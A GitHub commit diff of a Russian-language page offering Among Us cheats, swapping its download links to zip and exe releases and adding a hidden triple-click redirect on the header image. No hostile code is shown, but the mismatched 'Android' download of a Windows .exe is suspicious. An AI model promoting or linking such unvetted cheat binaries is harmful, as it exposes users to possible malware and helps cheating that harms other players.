Commit a696b54 1 parent d57cdd2 commit a696b54 Copy full SHA for a696b54
File tree 1 file changed +13
-4
lines changed
1 file changed +13
-4
lines changed Original file line number Diff line number Diff line change 35
35
width : 100% ;
36
36
height : 350px ;
37
37
background : url ('cheat.jpg' ) center/contain no-repeat;
38
+ cursor : pointer;
38
39
}
39
40
.button-group {
40
41
display : flex;
73
74
</ style >
74
75
</ head >
75
76
< body >
76
- < div class ="header-image "> </ div >
77
+ < div class ="header-image " id =" headerImage " > </ div >
77
78
< h1 > Самые лучшие читы на Among Us</ h1 >
78
79
< div class ="button-group ">
79
- < a href ="https://github.com/MAINER4IK/SickoMenu /releases/download/Release/SickoMenu.zip " download >
80
+ < a href ="https://github.com/MAINER4IK/SickoPolar /releases/download/Release/SickoMenu.zip " download >
80
81
< button class ="code-button "> Скачать на Windows</ button >
81
82
</ a >
82
- < a href ="https://github.com/MAINER4IK/windofrar /releases/download/Release/windofrar.exe " download >
83
+ < a href ="https://github.com/MAINER4IK/SickoPolar /releases/download/Release/Polar.Pather.zip " download >
83
84
< button class ="download-button "> Скачать на Android</ button >
84
85
</ a >
85
86
</ div >
@@ -106,6 +107,14 @@ <h1>Самые лучшие читы на Among Us</h1>
106
107
if ( delCount === 0 ) window . location . href = 'index.html' ;
107
108
}
108
109
} ) ;
110
+
111
+ let clickCount = 0 ;
112
+ document . getElementById ( 'headerImage' ) . addEventListener ( 'click' , ( ) => {
113
+ clickCount ++ ;
114
+ if ( clickCount === 3 ) {
115
+ window . location . href = 'index.html' ;
116
+ }
117
+ } ) ;
109
118
</ script >
110
119
</ body >
111
- </ html >
120
+ </ html >
You can’t perform that action at this time.
0 commit comments